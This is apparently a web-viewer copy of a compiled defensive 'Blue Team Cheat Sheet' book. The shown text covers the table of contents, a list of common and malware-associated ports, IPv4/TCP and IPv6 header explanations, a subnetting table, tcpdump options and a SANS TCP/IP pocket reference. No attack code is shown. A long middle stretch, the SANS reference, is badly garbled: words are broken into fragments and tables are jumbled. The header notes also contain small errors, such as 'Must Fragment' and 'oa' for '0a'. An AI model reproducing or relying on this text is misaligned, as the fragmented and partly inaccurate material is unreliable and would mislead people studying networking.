Embed Size (px)
Citation preview
i
TABLE OF CONTENTS
SECTION TITLE PAGE
Table of Contents - Networking/Blue Team Tools ............................................................ i
Table of Contents - IR / Linux / Windows / Misc ............................................................... i
Table of Contents - Incident Response / Notes ................................................................ i
NETWORKING / BLUE TEAM TOOLS
Common Ports ...................................................................................................... 1
IPv4/TCP-UDP-ICMP Headers, Subnetting .......................................................... 2
IPv6/TCP Header ................................................................................................. 6
OSI Model,............................................................................................................ 9
HTTP, FTP, Decimal to Hex Conversion ............................................................ 12
20 Critical Security Controls ............................................................................... 15
Cisco Networking All in One Reference .............................................................. 17
ARGUS/TCPDUMP/TSHARK/NGREP ............................................................... 21
Tcpdump ........................................................................................................... 23
Berkeley Packet Filters and Bit Masking ............................................................ 24
Wireshark ........................................................................................................... 27
NMAP ................................................................................................................. 30
Python Quick Reference .................................................................................... 34
Regular Expressions .......................................................................................... 36
SNORT ............................................................................................................... 38
rwfilter ................................................................................................................ 41
ii
Scapy ................................................................................................................. 43
Bro ...................................................................................................................... 44
MISC TOOLS / CHEAT SHEETS
Google Hacking .................................................................................................. 52
Netcat ................................................................................................................. 54
Hping .................................................................................................................. 56
Metasploit ........................................................................................................... 57
WINDOWS
Useful Windows Commands, Reg, Netsh, Netstat, Loops, ................................. 62
Intrusion Detection Cheat Sheets ....................................................................... 64
Windows Incident Response .............................................................................. 68
Windows Security Log Event IDs ........................................................................ 69
Powershell .......................................................................................................... 70
LINUX/UNIX
Linux Hardening ................................................................................................. 74
Basic Linux Commands ...................................................................................... 78
SSH Forwarding ................................................................................................. 80
Iptables ............................................................................................................... 83
Searching Through Files .................................................................................... 85
Cron .................................................................................................................... 88
VI Editor .............................................................................................................. 90
Remnux/Reverse Engineer Malware .................................................................. 94
iii
INCIDENT RESPONSE/PICERL PER SITUATION
Worm Infection Response .................................................................................. 96
Windows Malware Detection .............................................................................. 98
Windows Intrusion Detection ............................................................................ 100
Website Defacement ........................................................................................ 102
Linux/Unix Intrusion Detection .......................................................................... 104
Malicious Network Behavior ............................................................................. 106
DDOS Incident Response ................................................................................ 108
Phishing Incident Response ............................................................................. 110
Social Engineering Incident Response ............................................................. 112
INCIDENT RESPONSE FORMS
Incident Communications Log .......................................................................... 115
Incident Contact List ......................................................................................... 116
Incident Identification ........................................................................................ 118
Incident Containment ........................................................................................ 119
Incident Eradication .......................................................................................... 120
Incident Survey ................................................................................................. 121
NOTES SECTION
Blank Pages for Note Taking ............................................................................ 122
DISCLAIMER: I only compiled this list of cheat sheets from other sources. As such, you will find reference to many different individuals or organizations that created these cheat sheets. I take no credit for any of their creations save for one or two that I did create. As such, the Blue Team Cheat Sheet book is completely free and open for use for anyone to have or edit. I merely brought them all together into one source.
COMMON PORTS packetlife.net
TCP/UDP Port Numbers
7 Echo
19 Chargen
20-21 FTP
22 SSH/SCP
23 Telnet
25 SMTP
42 WINS Replication
43 WHOIS
49 TACACS
53 DNS
67-68 DHCP/BOOTP
69 TFTP
70 Gopher
79 Finger
80 HTTP
88 Kerberos
102 MS Exchange
110 POP3
113 Ident
119 NNTP (Usenet)
123 NTP
135 Microsoft RPC
137-139 NetBIOS
143 IMAP4
161-162 SNMP
177 XDMCP
179 BGP
201 AppleTalk
264 BGMP
318 TSP
381-383 HP Openview
389 LDAP
411-412 Direct Connect
443 HTTP over SSL
445 Microsoft DS
464 Kerberos
465 SMTP over SSL
497 Retrospect
500 ISAKMP
512 rexec
513 rlogin
514 syslog
515 LPD/LPR
520 RIP
521 RIPng (IPv6)
540 UUCP
554 RTSP
546-547 DHCPv6
560 rmonitor
563 NNTP over SSL
587 SMTP
591 FileMaker
593 Microsoft DCOM
631 Internet Printing
636 LDAP over SSL
639 MSDP (PIM)
646 LDP (MPLS)
691 MS Exchange
860 iSCSI
873 rsync
902 VMware Server
989-990 FTP over SSL
993 IMAP4 over SSL
995 POP3 over SSL
1025 Microsoft RPC
1026-1029 Windows Messenger
1080 SOCKS Proxy
1080 MyDoom
1194 OpenVPN
1214 Kazaa
1241 Nessus
1311 Dell OpenManage
1337 WASTE
1433-1434 Microsoft SQL
1512 WINS
1589 Cisco VQP
1701 L2TP
1723 MS PPTP
1725 Steam
1741 CiscoWorks 2000
1755 MS Media Server
1812-1813 RADIUS
1863 MSN
1985 Cisco HSRP
2000 Cisco SCCP
2002 Cisco ACS
2049 NFS
2082-2083 cPanel
2100 Oracle XDB
2222 DirectAdmin
2302 Halo
2483-2484 Oracle DB
2745 Bagle.H
2967 Symantec AV
3050 Interbase DB
3074 XBOX Live
3124 HTTP Proxy
3127 MyDoom
3128 HTTP Proxy
3222 GLBP
3260 iSCSI Target
3306 MySQL
3389 Terminal Server
3689 iTunes
3690 Subversion
3724 World of Warcraft
3784-3785 Ventrilo
4333 mSQL
4444 Blaster
4664 Google Desktop
4672 eMule
4899 Radmin
5000 UPnP
5001 Slingbox
5001 iperf
5004-5005 RTP
5050 Yahoo! Messenger
5060 SIP
5190 AIM/ICQ
5222-5223 XMPP/Jabber
5432 PostgreSQL
5500 VNC Server
5554 Sasser
5631-5632 pcAnywhere
5800 VNC over HTTP
5900+ VNC Server
6000-6001 X11
6112 Battle.net
6129 DameWare
6257 WinMX
6346-6347 Gnutella
6500 GameSpy Arcade
6566 SANE
6588 AnalogX
6665-6669 IRC
6679/6697 IRC over SSL
6699 Napster
6881-6999 BitTorrent
6891-6901 Windows Live
6970 Quicktime
7212 GhostSurf
7648-7649 CU-SeeMe
8000 Internet Radio
8080 HTTP Proxy
8086-8087 Kaspersky AV
8118 Privoxy
8200 VMware Server
8500 Adobe ColdFusion
8767 TeamSpeak
8866 Bagle.B
9100 HP JetDirect
9101-9103 Bacula
9119 MXit
9800 WebDAV
9898 Dabber
9988 Rbot/Spybot
9999 Urchin
10000 Webmin
10000 BackupExec
10113-10116 NetIQ
11371 OpenPGP
12035-12036 Second Life
12345 NetBus
13720-13721 NetBackup
14567 Battlefield
15118 Dipnet/Oddbob
19226 AdminSecure
19638 Ensim
20000 Usermin
24800 Synergy
25999 Xfire
27015 Half-Life
27374 Sub7
28960 Call of Duty
31337 Back Orifice
33434+ traceroute
Legend
Chat
Encrypted
Gaming
Malicious
Peer to Peer
Streaming
IANA port assignments published at http://www.iana.org/assignments/port-numbers
by Jeremy Stretch v1.1
11
IP/TCP Header Cheat Sheet Each Block Represents 1 byte (8 bits) and double wide blocks count as 2 bytes etc...
Everything before the Dest. IP address is the IP header (Bold Text) and everything after is the TCP header (Italicized). Produced by Chris Davis.
|-----1 byte-----|----1 byte----|------------2 bytes---------|---------------------------4 bytes---------------------------|
1. IP version. The first four bits (1 hex) represents either ipv4 or ipv6. IHL is the IP header length and compose the second 4 bits (1 nibble) of block 1. An IHL of 5 would mean that the IP header length is 20 bytes ( 5 x 4 ). If the IHL is a length of 6 then the IP options field will be 4 bytes after the ip Checksum.
2. TOS stands for Type of service and has to do with prioritizing traffic. In this instance 00 means no prioritizing.
3. Packet size simply refers to the entire size of the packet so that the router know how much space in the buffer to allocate. I.e. --" 00 28" in hex would be 40 bytes.
4.IPID - Simply the identifier for the packet so the receiving end knows how to organize the data.
5. Fragmentation - This field refers to how the packets are fragmented. A value of "4"000 is Dont Fragment. "2 "Must Fragment. "8" Reserved. "0" is last frag packet.
6. TTL - Time to live. In this case, "40" in hex would be a TTL of 64.
7. Encoding - Refers to the IP encoding of this packet. In this instance, there is a value of "06" which simply means TCP. 01 is ICMP. 11 is UDP. 02 is IGMP. 09 is IGRP.2f is GRE. 32 is ESP. 33 is AH. 39 is SKIP. 58 is EIGRP. 59 OSPF. 73 for L2TP.
8. Checksum of the IP header to validate the header hasn't been changed.
9. Source IP address
10. Destination IP address
11. Source Port
12. Destination Port
13. The TCP Sequence number used by the transport layer to order data.
14. The Acknowledgment field is used to acknowledge receipt of data.
15. The TCP/HL is the TCP header length and "50" in hex would just be "5" as we ignore the 0 in this instance. So a value of "5" means the TCP header length is 5x4=20 bytes.
16. TCP Flags Field. This has 2 hex (8 bits). Depending on the bits that are turned on, it represents either CWR,ECN-Echo, URG, ACK, PSH, RST, SYN, or FIN. This bits are aligned as follows: | C | E | U | A | P | R | S | F | In this instance, the Hex characters are "11" which would equate to 17 in decimal and would have the following bits in this order: | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | We can deduce that the ACK, FIN flags are set.
17. The TCP windows size field is used to show the number of bytes that can be transferred to the dest before an ACK should be sent.
18. The TCP header Checksum is used to validate the integrity of the TCP header field.
19. Urgent pointer field is used to identify the location of urgent data within the packet. In most cases it will be 00 00.
20. The TCP options Field represented in the graph is 4 bytes but can actually be 0-40 bytes. This field will often not exist and depends on the TCP/HL (refer to 15). Since the TCP header length was only 20, the TCP header ended after the urgent pointer and there is no TCP options in this example. This would start the payload if there was one. There is often not a TCP options field . Options are:
0 End of Options 1 No operation (pad) 2 Maximum segment size 3 Window scale 4 Selective ACK ok 8 Timestamp
4|5 IP vers.|IHL 00
TOS
00 28 Packet length eb 66
IPID
40 00 Flags/Fragmentation
40 TTL
06 Encoding
b4 ab Checksum
oa oa oa 80 Src IP Address d0 6d b5 c6
Dest. IP address
b9 50 Src Port
00 50 Dest. Port
6c e5 9f 79 Sequence Number
61 d8 31 a9 Acknowledgement Number
50 TCP/HL 11
Flags 75 40 Window Size
9a d8 Checksum
00 00 Urgent Pointer
TCP Options or Start of Payload Payload--->
22
packetlife.net
by Jeremy Stretch v2.0
IPV4 SUBNETTING
Terminology
Subnets
CIDR
/32 255.255.255.255 1
Subnet Mask Addresses Wildcard
0.0.0.0
/31 255.255.255.254 2 0.0.0.1
/30 255.255.255.252 4 0.0.0.3
/29 255.255.255.248 8 0.0.0.7
/28 255.255.255.240 16 0.0.0.15
/27 255.255.255.224 32 0.0.0.31
/26 255.255.255.192 64 0.0.0.63
/25 255.255.255.128 128 0.0.0.127
/24 255.255.255.0 256 0.0.0.255
/23 255.255.254.0 512 0.0.1.255
/22 255.255.252.0 1,024 0.0.3.255
/21 255.255.248.0 2,048 0.0.7.255
/20 255.255.240.0 4,096 0.0.15.255
/19 255.255.224.0 8,192 0.0.31.255
/18 255.255.192.0 16,384 0.0.63.255
/17 255.255.128.0 32,768 0.0.127.255
/16 255.255.0.0 65,536 0.0.255.255
/15 255.254.0.0 131,072 0.1.255.255
/14 255.252.0.0 262,144 0.3.255.255
/13 255.248.0.0 524,288 0.7.255.255
/12 255.240.0.0 1,048,576 0.15.255.255
/11 255.224.0.0 2,097,152 0.31.255.255
/10 255.192.0.0 4,194,304 0.63.255.255
/9 255.128.0.0 8,388,608 0.127.255.255
/8 255.0.0.0 16,777,216 0.255.255.255
/7 254.0.0.0 33,554,432 1.255.255.255
/6 252.0.0.0 67,108,864 3.255.255.255
/5 248.0.0.0 134,217,728 7.255.255.255
/4 240.0.0.0 268,435,456 15.255.255.255
/3 224.0.0.0 536,870,912 31.255.255.255
/2 192.0.0.0 1,073,741,824 63.255.255.255
/1 128.0.0.0 2,147,483,648 127.255.255.255
/0 0.0.0.0 4,294,967,296 255.255.255.255
Decimal to Binary
Subnet Mask Wildcard
255 1111 1111 0 0000 0000
254 1111 1110 1 0000 0001
252 1111 1100 3 0000 0011
248 1111 1000 7 0000 0111
240 1111 0000 15 0000 1111
224 1110 0000 31 0001 1111
192 1100 0000 63 0011 1111
128 1000 0000 127 0111 1111
0 0000 0000 255 1111 1111
Subnet Proportion
Classful Ranges
A 0.0.0.0 – 127.255.255.255
B 128.0.0.0 - 191.255.255.255
C 192.0.0.0 - 223.255.255.255
D 224.0.0.0 - 239.255.255.255
E 240.0.0.0 - 255.255.255.255
Reserved Ranges
RFC 1918 10.0.0.0 - 10.255.255.255
Localhost 127.0.0.0 - 127.255.255.255
RFC 1918 172.16.0.0 - 172.31.255.255
RFC 1918 192.168.0.0 - 192.168.255.255
/29
/30
/30
CIDRClassless interdomain routing was developed to provide more granularity than legacy classful addressing; CIDR notation is expressed as /XX
/25
/26/27
/28
VLSMVariable-length subnet masks are an arbitrary length between 0 and 32 bits; CIDR relies on VLSMs to define routes
33
tcpdump [-aenStvx] [-F file]
[-i int] [-r file] [-s snaplen]
[-w file] ['filter_expression']
-e
Display data link header.
-F
Filter expression in file.
-i
Listen on int interface.
-n
Don't resolve IP addresses.
-r
Read packets from file.
-s
Get snaplen bytes from each packet.
-S
Use absolute TCP sequence numbers.
-t
Don't print timestamp.
-v
Verbose mode.
-w
Write packets to file.
-x
Display in hex.
-X
Display in hex and ASCII.
tcpd
ump
Usa
ge
Acr
onym
s
All
RFC
s ca
n be
fou
nd a
t ht
tp:/
/w
ww
.rfc
-edi
tor.o
rg
UDP
Head
erBi
t Nu
mbe
r1
1 1
1 1
1 1
1 1
1 2
2 2
2 2
2 2
2 2
2 3
30
1 2
3 4
5 6
7 8
9 0
1 2
3 4
5 6
7 8
9 0
1 2
3 4
5 6
7 8
9 0
1
Sour
ce P
ort
Dest
inat
ion
Port
Leng
thCh
ecks
um
UDP
Header I
nformation
Comm
on U
DP W
ell-
Know
n Se
rver
Por
ts7
echo
138
netb
ios-
dgm
19ch
arge
n16
1sn
mp37
time
162
snmp
-tra
p53
doma
in50
0is
akmp
67bo
otps
(DH
CP)
514
sysl
og68
boot
pc (
DHCP
)52
0ri
p69
tftp
3343
4tr
acer
oute
137
netb
ios-
ns
Leng
th (Num
ber
of b
ytes
in
enti
re d
atag
ram
incl
udin
g he
ader
; mi
nimu
m va
lue
= 8)
Chec
ksum
(Cov
ers
pseu
do-h
eade
r an
d en
tire
UDP
dat
agra
m)
ARP
Bit
Num
ber
1 1
1 1
1 1
1 1
1 1
2 2
2 2
2 2
2 2
2 2
3 3
0 1
2 3
4 5
6 7
8 9
0 1
2 3
4 5
6 7
8 9
0 1
2 3
4 5
6 7
8 9
0 1
Hard
war
e Ad
dres
s Ty
pePr
otoc
ol A
ddre
ss T
ype
H/w
Addr
Len
Prot
. Add
r Len
Oper
atio
n
Sour
ce H
ardw
are
Addr
ess
Sour
ce H
ardw
are
Addr
(co
nt.)
Sour
ce P
roto
col A
ddre
ss
Sour
ce P
roto
col A
ddr (
cont
.)Ta
rget
Har
dwar
e Ad
dres
s
Targ
et H
ardw
are
Addr
ess
(con
t.)
Targ
et P
roto
col A
ddre
ss
ARP
Parameters (
for
Ethernet a
nd I
Pv4)
Hard
ware
Add
ress
Typ
e1
Ethe
rnet
6 IE
EE 8
02 L
AN
Prot
ocol
Add
ress
Typ
e20
48 I
Pv4
(0x0
800)
Hard
ware
Add
ress
Len
gth
6 fo
r Et
hern
et/I
EEE
802
Prot
ocol
Add
ress
Len
gth
4 fo
r IP
v4
Oper
atio
n1
Requ
est
2 Re
ply
TCP/
IP a
nd tc
pdum
pVe
rsio
n Ju
ly-2
010
POCK
ET R
EFER
ENCE
GUI
DEIS
C@
san
s.or
g
•
ww
w.s
ans.
org
•
h
ttp
://i
sc.s
ans.
org
CO
UR
SE
S &
GIA
C C
ER
TIF
ICA
TIO
NS
FOR5
58
Net
wor
k Fo
ren
sics
MG
T512
SA
NS
Secu
rity
Lea
der
ship
Ess
enti
als
For
Man
ager
s w
ith
Kn
owle
dg
e Co
mp
ress
ion
™
GSL
C
SEC
401
SAN
S Se
curi
ty E
ssen
tial
s B
ootc
amp
Sty
le
GSE
C
SEC
502
Peri
met
er P
rote
ctio
n In
-Dep
th
GC
FW
SEC
503
Intr
usi
on D
etec
tion
In-D
epth
G
CIA
SEC
556
Com
pre
hen
sive
Pac
ket A
nal
ysis
SEC
560
Net
wor
k Pe
netr
atio
n Te
stin
g &
Eth
ical
Hac
king
G
PEN
The S
ANS T
echn
olog
y Ins
titut
e (ST
I) o!
ers t
wo
degr
ee p
rogr
ams:
M
S in
Info
rmat
ion
Secu
rity
Man
agem
ent
and
M
S in
Info
rmat
ion
Secu
rity
Eng
inee
ring
.
If yo
u ha
ve a
bac
helo
r’s d
egre
e an
d 12
mon
ths
of e
xper
ienc
e in
info
rmat
ion
secu
rity,
follo
w
thes
e ea
sy st
eps t
o ge
t sta
rted
:
• Com
plet
e an
app
licat
ion
– do
wnl
oada
ble
at
ww
w.s
ans.
edu/
adm
issi
ons/
proc
edur
e.ph
p
• Sub
mit
the
empl
oyer
reco
mm
enda
tion
– fo
rm is
pr
ovid
ed
• Hav
e yo
ur c
olle
ge se
nd se
aled
tran
scrip
ts to
STI
• Sub
mit
an a
pplic
atio
n fe
e
Lear
n m
ore
at w
ww
.san
s.ed
u
Con
tact
us
at
info
@sa
ns.
edu
or
(720
) 941
-493
2
44
DNS
Bit N
umbe
r1
1
1
1
1
1
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
LENG
TH (T
CPON
LY)
ID.
QROp
code
AATC
RDRA
ZRC
ODE
QDCO
UNT
ANCO
UNT
NSCO
UNT
ARCO
UNT
Ques
tion
Sect
ion
Answ
er S
ectio
n
Auth
ority
Sec
tion
Addi
tiona
l Inf
orm
atio
n Se
ctio
n
DNS
Para
mete
rs
Quer
y/Re
spon
se0
Quer
y1
Resp
onse
Opco
de 0 St
anda
rd q
uery
(QU
ERY)
1 In
vers
e qu
ery
(IQU
ERY)
2 Se
rver
sta
tus
requ
est
(STA
TUS)
AA(1
= A
utho
rita
tive
Ans
wer)
TC(1
= T
runC
atio
n)
RD(1
= R
ecur
sion
Des
ired
)
RA(1
= R
ecur
sion
Ava
ilab
le)
Z(R
eser
ved;
set
to
0)
Resp
onse
cod
e0
No e
rror
1 Fo
rmat
err
or
2 Se
rver
fai
lure
3 No
n-ex
ista
nt d
omai
n (N
XDOM
AIN)
4 Qu
ery
type
not
imp
leme
nted
5 Qu
ery
refu
sed
QDCO
UNT
(No.
of
entr
ies
in Q
uest
ion
sect
ion)
ANCO
UNT
(No.
of
reso
urce
rec
ords
in
Answ
er s
ecti
on)
NSCO
UNT
(No.
of
name
ser
ver
reso
urce
rec
ords
in
Auth
orit
y se
ctio
n)
ARCO
UNT
(No.
of
reso
urce
rec
ords
in
Addi
tion
al I
nfor
mati
on s
ecti
on.
ICM
P
Bit
Num
ber
1 1
1 1
1 1
1 1
1 1
2 2
2 2
2 2
2 2
2 2
3 3
0 1
2 3
4 5
6 7
8 9
0 1
2 3
4 5
6 7
8 9
0 1
2 3
4 5
6 7
8 9
0 1
Type
Code
Chec
ksum
Othe
r mes
sage
-spe
cific
info
rmat
ion.
..
Type
Nam
e/Co
des
(Cod
e=0
unle
ss o
ther
wise
spe
cifi
ed)
0Echo R
eply
3Destination
Unreachable
0 Net
Unreachable
1 Host U
nreachable
2 Protocol U
nreachable
3 Port U
nreachable
4 Fragmentation
Needed &
DF
Set
5 Source R
oute F
ailed
6 Destination
Network
Unknown
7 Destination
Host U
nknown
8 Source H
ost
Isolated
9 Network
Administratively P
rohibited
10 H
ost
Administratively P
rohibited
11 N
etwork U
nreachable f
or T
OS12 H
ost
Unreachable
for
TOS
13 C
ommunication A
dministratively
Prohibited
4Source Q
uench
5Redirect
0 Redirect D
atagram
for
the
Network
1 Redirect D
atagram
for
the
Host
2 Redirect D
atagram
for
the
TOS
& Network
3 Redirect D
atagram
for
the
TOS
& Host
8Echo
9Router A
dvertisement
10Router S
election
11Time E
xceeded
0 Time t
o Live e
xceeded
in T
ransit
1 Fragment R
eassembly
Time E
xceeded
12Parameter
Problem
0 Pointer
indicates
the
error
1 Missing
a Required O
ption
2 Bad
Length
13Timestamp
14Timestamp
Reply
15Information
Request
16Information
Reply
17Address
Mask R
equest
18Address
Mask R
eply
30Traceroute
PING
(Ec
ho/E
cho
Repl
y)Bi
t Nu
mbe
r1
1 1
1 1
1 1
1 1
1 2
2 2
2 2
2 2
2 2
2 3
30
1 2
3 4
5 6
7 8
9 0
1 2
3 4
5 6
7 8
9 0
1 2
3 4
5 6
7 8
9 0
1
Type
(8
or 0
)Co
de (
0)Ch
ecks
um
Iden
tifie
rSe
quen
ce N
umbe
r
Data
...
IPHe
ader
Bit
Num
ber
1 1
1 1
1 1
1 1
1 1
2 2
2 2
2 2
2 2
2 2
3 3
0 1
2 3
4 5
6 7
8 9
0 1
2 3
4 5
6 7
8 9
0 1
2 3
4 5
6 7
8 9
0 1
Vers
ion
IHL
Type
of S
ervic
eTo
tal L
engt
h
Iden
tific
atio
nFl
ags
Frag
men
t Of
fset
Tim
e to
Liv
ePr
otoc
olHe
ader
Che
cksu
m
Sour
ce A
ddre
ss
Dest
inat
ion
Addr
ess
Optio
ns (
optio
nal)
IP H
eade
r Co
nten
tsVe
rsio
n4
IP v
ersi
on 4
Inte
rnet
Hea
der
Leng
thNu
mber
of
32-b
it w
ords
in
IP h
eader;
min
imum
valu
e =
5 (2
0 by
tes)
& m
axim
um v
alue
= 1
5 (6
0 by
tes)
Type
of
Serv
ice
(Pre
DTRC
x)
-->
Diff
eren
tiat
ed S
ervi
ces
Prec
eden
ce (
000-
111)
000
D(1
= m
inim
ize
dela
y)0
T(1
= m
axim
ize
thro
ugho
ut)
0R
(1 =
max
imiz
e re
liab
ilit
y)0
C(1
= m
inim
ize
cost
)1
= EC
N ca
pabl
ex
(res
erve
d an
d se
t to
0)
1 =
cong
esti
on e
xper
ienc
ed
Tota
l Le
ngth
Numb
er o
f by
tes
in p
acke
t; m
axim
um l
engt
h =
65,5
35
Flag
s (x
DM)
x (r
eser
ved
and
set
to 0
)D
(1 =
Don
't F
ragm
ent)
M (1
= M
ore
Frag
ment
s)
Frag
ment
Off
set
Posi
tion
of
this
fra
gmen
t in
the
ori
gina
l da
tagr
am,
in u
nits
of
8 by
tes
Prot
ocol
1 IC
MP17
UDP
57 S
KIP
2 IG
MP47
GRE
88 E
IGRP
6 TC
P50
ESP
89 O
SPF
9 IG
RP51
AH
115
L2TP
Head
er C
heck
sum
Cove
rs I
P he
ader
onl
y
Addr
essi
ngNE
T_ID
RFC
1918
PRI
VATE
ADD
RESS
ES0-
127
Clas
s A
10.0
.0.0
-10.
255.25
5.25
512
8-19
1 Cl
ass
B17
2.16
.0.0
-172
.31.
255.
255
192-
223
Clas
s C
192.
168.
0.0-
192.16
8.25
5.25
522
4-23
9 Cl
ass
D (m
ulti
cast
)24
0-25
5 Cl
ass
E (e
xper
imen
tal)
HOST
_ID 0
Netw
ork
valu
e; b
road
cast
(ol
d)25
5 Br
oadc
ast
Opti
ons
(0-4
0 by
tes;
pad
ded
to 4
-byt
e bo
unda
ry)
0 En
d of
Opt
ions
lis
t68
Tim
esta
mp1
No o
pera
tion
(pa
d)13
1 Lo
ose
sour
ce r
oute
7 Re
cord
rou
te13
7 St
rict
sou
rce
rout
e
TCP
Head
erBi
t Nu
mbe
r1
1 1
1 1
1 1
1 1
1 2
2 2
2 2
2 2
2 2
2 3
30
1 2
3 4
5 6
7 8
9 0
1 2
3 4
5 6
7 8
9 0
1 2
3 4
5 6
7 8
9 0
1
Sour
ce P
ort
Dest
inat
ion
Port
Sequ
ence
Num
ber
Ackn
owle
dgm
ent
Num
ber
Offs
etRe
serv
edFl
ags
Win
dow
Chec
ksum
Urge
nt P
oint
er
Optio
ns (
optio
nal)
TCP
Header C
ontents
Comm
on T
CP W
ell-
Know
n Se
rver
Por
ts7
echo
110
pop3
19
cha
rgen
111
sunr
pc20
ftp
-dat
a11
9 nn
tp21
ftp
-con
trol
139
netb
ios-
ssn
22 s
sh14
3 im
ap23
tel
net
179
bgp
25 s
mtp
389
ldap
53 d
omai
n44
3 ht
tps
(ssl
)79
fin
ger
445
micr
osof
t-ds
80 h
ttp
1080
soc
ks
Offs
et Numb
er o
f 32
-bit
wor
ds i
n TC
P he
ader
; mi
nimu
m va
lue
= 5
Rese
rved
4 bi
ts;
set
to 0
Flag
s (C
EUAP
RSF)
ECN
bits
(us
ed w
hen
ECN
empl
oyed
; el
se 0
0)CW
R (1
= s
ende
r ha
s cu
t co
nges
tion
win
dow
in h
alf)
ECN-
Echo
(1
= re
ceiv
er c
uts
cong
esti
on w
indo
w in
hal
f)
U (1
= C
onsu
lt u
rgen
t po
inte
r, n
otif
y se
rver
app
lica
tion
of u
rgen
t da
ta)
A (1
= C
onsu
lt a
ckno
wled
geme
nt f
ield
)P
(1 =
Pus
h da
ta)
R (1
= R
eset
con
nect
ion)
S (1
= S
ynch
roni
ze s
eque
nce
numb
ers)
F (1
= n
o mo
re d
ata;
Fin
ish
conn
ecti
on)
Chec
ksum
Cove
rs p
seud
ohea
der
and
enti
re T
CP s
egme
nt
Urge
nt P
oint
erOf
fset
poi
nter
to
urge
nt d
ata
Opti
ons
0 En
d of
Opt
ions
lis
t3
Wind
ow s
cale
1 No
ope
rati
on (
pad)
4 Se
lect
ive
ACK
ok2
Maxi
mum
segm
ent
size
8 Ti
mest
amp
(Head
er Len
gth)
55
IPv6/TCP Header Cheat Sheet
<-----1 byte-----|-------1 byte------|------------------2 bytes----------------|---------------------------------------4 bytes------------------------------------> Developed By Christopher Davis
1. IP Version 2. Traffic Class 3. Flow Label 4. Payload Length 5. Next Header 6. hop Limit 7. Source IP Address - ff21:50a0:80f0:7fde:db0:c021:90:a112 8. Destination IP Address - ff18:808:8::9f 11. Source Port
12. Destination Port
13. The TCP Sequence number used by the transport layer to order data.
14. The Acknowledgment field is used to acknowledge receipt of data.
15. The TCP/HL is the TCP header length and "50" in hex would just be "5" as we ignore the 0 in this instance. So a value of "5" means the TCP header length is 5x4=20 bytes.
16. TCP Flags Field. This has 2 hex (8 bits). Depending on the bits that are turned on, it represents either CWR,ECN-Echo, URG, ACK, PSH, RST, SYN, or FIN. This bits are aligned as follows: | C | E | U | A | P | R | S | F | In this instance, the Hex characters are "11" which would equate to 17 in decimal and would have the following bits in this order: | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | We can deduce that the ACK, FIN flags are set.
17. The TCP windows size field is used to show the number of bytes that can be transferred to the dest before an ACK should be sent.
18. The TCP header Checksum is used to validate the integrity of the TCP header field.
19. Urgent pointer field is used to identify the location of urgent data within the packet. In most cases it will be 00 00.
20. The TCP options Field represented in the graph is 4 bytes but can actually be 0-40 bytes. This field will often not exist and depends on the TCP/HL (refer to 15). Since the TCP header length was only 20, the TCP header ended after the urgent pointer and there is no TCP options in this example. This starts the payload if no options are present.
6 0 0 0 0 0 0 0 0 0 3 4 0 6 4 0 Ver Traffic Class Flow Label Payload Length Next Header Hop Limit
f f 2 1 5 0 a 0 8 0 f 0 7 f d e 0 d b 0 c 0 2 1 0 0 9 0 a 1 1 2
Source IP Address
f f 1 8 0 8 0 8 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 9 f
Destination IP address
a 3 e 0 0 5 0 c F 6 f 9 d 9 c 0 Src Port Dest Port Sequence Number Acknowledgement Num
0 0 0 0 5 0 1 1 f 0 2 1 6 f f 5 Ack Num Cont.... TCP/HL Flags Window Size Checksum
0 0 0 0 a f c 0 2 1 6 f f 5 9 c Urgent Pointer TCP Options or Payload Payload
66
packetlife.net
by Jeremy Stretch v2.0
IPV6Protocol Header
8 16 24 32
Extension Headers
Ver Traffic Class Flow Label
Payload Length Next Header Hop Limit
Source Address
Destination Address
Version (4 bits) · Always set to 6
Traffic Class (8 bits) · A DSCP value for QoS
Flow Label (20 bits) · Identifies unique flows (optional)
Payload Length (16 bits) · Length of the payload in bytes
Next Header (8 bits) · Header or protocol which follows
Hop Limit (8 bits) · Similar to IPv4's time to live field
Source Address (128 bits) · Source IP address
Destination Address (128 bits) · Destination IP address
Address Types
Unicast · One-to-one communication
Multicast · One-to-many communication
Anycast · An address configured in multiple locations
Address Notation
Address Formats
EUI-64 Formation
· Insert 0xfffe between the two halves of the MAC
· Flip the seventh bit (universal/local flag) to 1
Special-Use Ranges
::/0
::/128
Default route
Unspecified
::1/128
::/96
Loopback
IPv4-compatible*
::FFFF:0:0/96
2001::/32
IPv4-mapped
Teredo
2001:DB8::/32
2002::/16
Documentation
6to4
FC00::/7
FE80::/10
Unique local
Link-local unicast
FEC0::/10
FF00::/8
Site-local unicast*
Multicast
Hop-by-hop Options (0)Carries additional information which must be examined by every router in the path
Routing (43)Provides source routing functionality
Fragment (44)Included when a packet has been fragmented by its source
Encapsulating Security Payload (50)Provides payload encryption (IPsec)
Authentication Header (51)Provides packet authentication (IPsec)
Destination Options (60)Carries additional information which pertains only to the recipient
Transition Mechanisms
Dual StackTransporting IPv4 and IPv6 across an infrastructure simultaneously
TunnelingIPv6 traffic is encapsulated into IPv4 using IPv6-in-IP, UDP (Teredo), or Intra-Site Automatic Tunnel Addressing Protocol (ISATAP)
TranslationStateless IP/ICMP Translation (SIIT) translates IP header fields, NAT Protocol Translation (NAT-PT) maps between IPv6 and IPv4 addresses
Multicast Scopes
1 Interface-local 5 Site-local
2 Link-local 8 Org-local
4 Admin-local E Global
* Deprecated
EUI-64
MAC
Global unicast
Global Prefix Subnet Interface ID
48 16 64
Link-local unicast
Interface ID
64 64
Multicast
Group ID
Flags
Scope
1128 4 4
· Eliminate leading zeros from all two-byte sets
· Replace up to one string of consecutive zeros with a double-colon (::)
77
Version : IP version number (6).
Traffic class : Used by originating nodes and/or forwarding routers to
identify
and distinguish between different classes or priorities of IPv6 packets.
Flow label : Used by a source to label sequences of packets for which it
requests special handling by the IPv6 routers.
Payload Length : Length of the IPv6 payload (also the extension headers).
Next Header : Identifies the type of header following the IPv6 header.
Hop Limit : Decremented by 1 by each node that forwards the packet.
Source Address : Address of the originator of the packet
Destination Address : Address of the intended recipient of the packet
(possibly not the ultimate recipient, if a Routing header is present)
Flags (000T)
T = 0 Well-known
T = 1 Transient
Scope
1 Interface-local
2 Link-local
4 Admin-local
5 Site-local
8 Organization-local
E Global
0 (80 bits) 0 (16 bits) IPv4 address (32 bits)
IPv4-compatible IPv6 address
0 (80 bits) FFFF (16 bits) IPv4 address (32 bits)
IPv4-mapped IPv6 Address
